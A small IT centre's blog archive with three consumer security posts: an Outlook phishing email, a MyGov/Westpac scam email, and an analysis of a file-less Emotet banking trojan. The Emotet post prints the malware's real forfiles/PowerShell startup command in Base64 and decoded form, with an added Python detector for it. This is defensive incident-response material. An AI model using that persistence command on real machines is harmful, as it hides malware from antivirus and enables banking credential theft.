Category Archives: Phishing

Security Alert – Outlook Phishing Email

Phishing emails come in many variants. Often they are an attempt to phish user credentials, which can be used by the attacker or sold on the darkweb.

Below is an example of an email designed to phish Outlook or Office 365 credentials.

Outlook is an online email service provided by Microsoft. Office 365 is Microsoft’s Office subscription service.

If someone was able to steal your password to either of these services they would then have access to your email, and if you are using it, files stored in OneDrive.

In this case, the spammer isn’t targeting one group, but instead killing two birds with one stone by targeting Outlook.com and Office 365 Users. This gives them a higher number of potential victims.

If someone is able to access your email account, they will be able to access all your online accounts by resetting your passwords.

The spammer has used several techniques to try and get the recipient to lower their guard.

If you’ve noticed, the email says it is from Outlook Office365 and shows that it comes from the email address: outlook @ office365.com.

Spammers can make an email appear to come from any email address. This is called spoofing. This gives the impression that the email is legitimate because it appears to come from a legitimate source.

The email arrived with the subject Security Alert. When you’re signing into a service on a new device, you will often receive a “security alert” email. This is a feature offered by many online services so that you are alerted if someone was to access your account.

The spammer is hoping that the subject of Security Alert is enough to tempt you to open the email.

The email goes on to say that there has been a new sign in from a Linux device. The spammer is mentioning an operating system with a low market share to again get you to lower your guard.

If the email mentioned a new sign in from Windows (which has a high market share), the recipient may just think it was themselves signing in to the service. But, by saying there was a new sign in from Linux, the spammer is hoping that the user is not a Linux user and will want to block this “attacker” from accessing their account.

The email has a button to click to “check activity”. This button is directed to a phishing website. The website looks legitimate and uses the Outlook.com logos and layout. If you were to enter your credentials into the website to “sign in”, these credentials would be sent to the spammer, who can now access your account or resell the credentials on the darkweb.

Always take caution when an email is asking you to act urgently. If you are unsure, you can sign into the service via the web browser (as opposed to clicking a link). Most services now have notifications within the service itself and will alert you to security related items.

With Outlook, you can visit https://accounts.microsoft.com and click the Security link to view more details about the security of your account. From this menu you can see Sign-in Activity, Check Password Security (and turn on 2FA), and update your security information.

If you have fallen for an Outlook.com phishing email, Microsoft have some resources on the steps you can take.

To learn about other scams and methods scammers are using, check out the ScamWatch website.

You can also check out other Tech Tips articles by Grenfell Internet Centre. Don’t forget to share this blog post with family and friends!

New Partnership with Westpac – Scam Email

MyGov and Westpac customers should be wary of a MyGov phishing email doing the rounds claiming you can earn a 30% discount on your next “tax payment” and a $300 bonus deposited in your account.

The email has the subject of New partnership with Westpac. New Rewards.

The scam email contains the Australian Government logo and the MyGov logo to give itself some credibility. The scammers have also spoofed the sender email to make it appear as though it has come from MyGov.

The email then goes on to say that ATO has signed a strategic partnership with Westpac, and that if you add your Westpac account to MyGov, you will receive a welcome bonus of $300.

The offer of a bonus is a tactic used by scammers to get you to lower your guard and to take the bait.

Upon clicking the link you are directed to a phishing website used to harvest MyGov credentials.

This would allow the scammer to access your MyGov records and everything attached to it. If you make the habit of reusing passwords the scammer could then use your password to log into your other accounts, such as your bank account, or email.

Phishing emails can be reported to allow the corporations being impersonated to take action by alerting customers to the scam, or by assisting authorities in taking down the scam.

ATO themed scams can be reported here: https://www.ato.gov.au/General/Online-services/Identity-security/Verify-or-report-a-scam/

Westpac themed scams can be reported here: https://www.westpac.com.au/security/how-to-report/

Google also allow you to report phishing pages which they can then block directly in Google Chrome. You can do that here: https://safebrowsing.google.com/safebrowsing/report_phish/?hl=en

Always be wary of emails offering a reward by doing very little. Phishing emails can be very well put together and anyone can fall victim. If something sounds too good to be true, it most likely is.

Feel free to share this article with friends and family to help keep them safe and secure online. And don’t forget to check out our previous Tech Tips articles.

Analyzing File-less Banking Malware

This malware appears to have originated from an email claiming to be ASIC Messaging Service. It advises the user that their business name is due for renewal. The link within the email does not take the user to the ASIC website, but instead links to a website for a community newspaper. This website appears to have at some stage been compromised. A page had been added that automatically forwards the user to another malicious website. This is where malware was downloaded onto the client's PC.

For those who are interested in the more technical details, I won't link directly to the pages, but the Virus Total page for the original link can be found here. The link which it redirects to is no longer available, but the Virus Total page can be viewed here. The second link has been marked by a member of the Virus Total community as ASIC phishing/malware.

I was investigating the malware infection for a client after the fact. At the time the client clicked the link (browser history verified the link was clicked) a JavaScript file appears to have been downloaded onto the machine. Virus Total / Hybrid Analysis links.

It is easy to blame the victim in these cases, but some phishing emails have become so well put together that anyone could fall for it.

The client had noticed that after this time a command prompt window would flash up on the screen upon Windows start up.

There was also a line at the bottom that I missed in the screenshot that read:

ERROR: Access is denied for “C:\WINDOWS\System32\winevt\”

At this time the client's bank contacted them to advise that their PC was infected with a Banking Trojan.

Removing File-less Banking Malware

I had no luck removing the malware with KVRT and had to proceed with a manual approach. ESET, my go-to AV, did not detect the malware, nor did Windows Defender.

KVRT showed the infection as:

MEM:Trojan-Banker.multi.Emotet.gen.

Upon inspecting the startup, a command that utilizes a trusted Windows executable file was set to run each bootup.

The command was:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwAewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkANQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"

When the text is decoded the command is:

forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec iex (gp 'HKCU:\\Identities\{464AEDF5-05C7-B661-1712-A9597829BE4D}').T"

Base64 text can be decoded using Certutil found in C:\WINDOWS\System32\

i.e. certutil.exe -decode encoded.txt decoded.txt

Base64 can also be decoded using an online service such as https://www.base64decode.org/.

Forfiles has been set to run each start up and load the malware from the registry into the memory. This avoids it writing to disk and helps to prevent detection.
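As an added example (not code from the article or from Grenfell Internet Centre), the Python script below decodes the -ec payload and checks a startup command line for the pattern described above: forfiles used as a proxy to launch a wildcard-masked powershell.exe, which then pulls its script body out of the registry. It assumes the command line has already been copied out of an autorun entry or process-creation log; the Base64 blob is the one quoted in the article, while the benign comparison entry and its vendor path are constructed. One caveat the page's certutil step does not mention: -EncodedCommand expects Base64 of UTF-16LE text, so the decoded file contains a NUL byte after every character, and the script decodes it as UTF-16LE to get readable text.

```python
"""Triage of a suspicious Windows startup command line (added example).

Decodes a PowerShell -EncodedCommand (-ec) argument and flags the living-off-the-land
pattern from the article: forfiles proxying a wildcard-masked powershell.exe that reads
its payload from the registry instead of from a file on disk.
"""
import base64
import fnmatch
import re

# The Base64 blob from the article's startup command, copied verbatim.
PAGE_ENCODED_COMMAND = (
    "aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAXABJAGQAZQBuAHQAaQB0AGkAZQBzAFwA"
    "ewA0ADYANABBAEUARABGADUALQAwADUAQwA3AC0AQgA2ADYAMQAtADEANwAxADIALQBBADkA"
    "NQA5ADcAOAAyADkAQgBFADQARAB9ACcAKQAuAFQA"
)

# Constructed: the startup entry as quoted in the article, with straight quotes.
PAGE_STARTUP_COMMAND = (
    "forfiles /s /p C:\\WINDOWS\\System32 /m p*ll.*e /c "
    '"cmd /c @file -ec ' + PAGE_ENCODED_COMMAND + '"'
)

# Constructed: a benign autorun entry for comparison (hypothetical vendor path).
BENIGN_STARTUP_COMMAND = '"C:\\Program Files\\ExampleVendor\\updater.exe" /silent'

# powershell.exe accepts -e, -ec, -enc and -encodedcommand for the same switch.
ENCODED_ARG_RE = re.compile(
    r"(?i)(?<![\w-])-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})"
)
FORFILES_MASK_RE = re.compile(r"(?i)\bforfiles\b.*?/m\s+(\S+)")
REGISTRY_PATH_RE = re.compile(r"(?i)HK(?:CU|LM|CR|U|CC):[\\\w{}\-]+")
INVOKE_EXPRESSION_RE = re.compile(r"\biex\b|invoke-expression")

# Script interpreters an attacker may hide behind a forfiles /m wildcard mask.
LOLBIN_INTERPRETERS = (
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
)


def decode_encoded_command(b64_text: str) -> str:
    """Decode a -EncodedCommand argument: Base64 of UTF-16LE text."""
    padded = b64_text + "=" * (-len(b64_text) % 4)
    return base64.b64decode(padded).decode("utf-16-le")


def mask_matches(mask: str, filename: str) -> bool:
    """Would a forfiles /m wildcard mask select this file name? (case-insensitive)"""
    return fnmatch.fnmatchcase(filename.lower(), mask.lower())


def triage_startup_command(cmdline: str) -> dict:
    """Return the indicators found in one autorun/startup command line."""
    findings = {"indicators": [], "decoded_command": None, "registry_paths": []}

    mask_match = FORFILES_MASK_RE.search(cmdline)
    if mask_match:
        findings["indicators"].append("forfiles_proxy_execution")
        # Expand the mask against known interpreters so "p*ll.*e" is recognised as powershell.
        masked = [n for n in LOLBIN_INTERPRETERS if mask_matches(mask_match.group(1), n)]
        if masked:
            findings["indicators"].append("wildcard_masked_interpreter")
            findings["masked_interpreters"] = masked

    enc = ENCODED_ARG_RE.search(cmdline)
    if enc:
        findings["indicators"].append("encoded_powershell_command")
        try:
            decoded = decode_encoded_command(enc.group(1))
        except (ValueError, UnicodeDecodeError):
            decoded = None
            findings["indicators"].append("undecodable_encoded_command")
        findings["decoded_command"] = decoded
        if decoded:
            low = decoded.lower()
            if INVOKE_EXPRESSION_RE.search(low):
                findings["indicators"].append("invoke_expression")
            paths = REGISTRY_PATH_RE.findall(decoded)
            findings["registry_paths"] = paths
            # Get-ItemProperty (gp) on a registry value feeding iex = payload kept off disk.
            if paths and ("gp " in low or "get-itemproperty" in low):
                findings["indicators"].append("payload_staged_in_registry")
    return findings


if __name__ == "__main__":
    import json
    print(json.dumps(triage_startup_command(PAGE_STARTUP_COMMAND), indent=2))
    print(json.dumps(triage_startup_command(BENIGN_STARTUP_COMMAND), indent=2))
```

Run it as a script and the article's command yields the decoded iex (gp 'HKCU:\\Identities\{...}').T text together with the registry path to inspect and delete, while the constructed benign entry yields no indicators. The same check can be run over every command line exported from an autoruns or Sysmon process-creation feed; the registry path it extracts is where the script body actually lives, which is the piece a file-based antivirus scan never sees.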

While I didn’t analyse exactly what EMOTET was doing, banking malware is designed to steal login credentials. The password is captured when you log into your bank and is sent back to a server that the attacker controls. Often with banking malware screenshots are taken to allow the attacker to capture other information such as funds available and account numbers.

Protecting yourself

Antivirus is not the magical safeguard it is often made out to be. It is still a great idea to have some kind of antivirus running on your device, but there are other tasks you can do to protect yourself or your business.

Train against phishing – It is simple for most home users: don’t click links, and avoid attachments from people you don’t know. But for business users, it is a little harder. Many staff members' jobs involve clicking links and opening attachments. This is why user training is important. Take a Phishing IQ Test.

Remove administrator privileges – I have covered this previously. Taking away administrator privileges can often limit what foothold malware can gain on your device.

Keep your software up to date – Some malware will exploit known vulnerabilities in your operating system or software. Windows users can install updates for the Operating System via Windows Updates (Windows Key + R, type control update, press enter, and click Check for updates). Software can be easily updated using Patch my PC.

Ask for help – If you receive an email that does not seem right, call a trusted friend or ask a colleague (If your business has in house IT staff start here). Sometimes talking out loud will help you tell if something is genuine or not.

Read our other articles and share with your friends – I have covered many other tech tips topics. Read them and share them with your friends.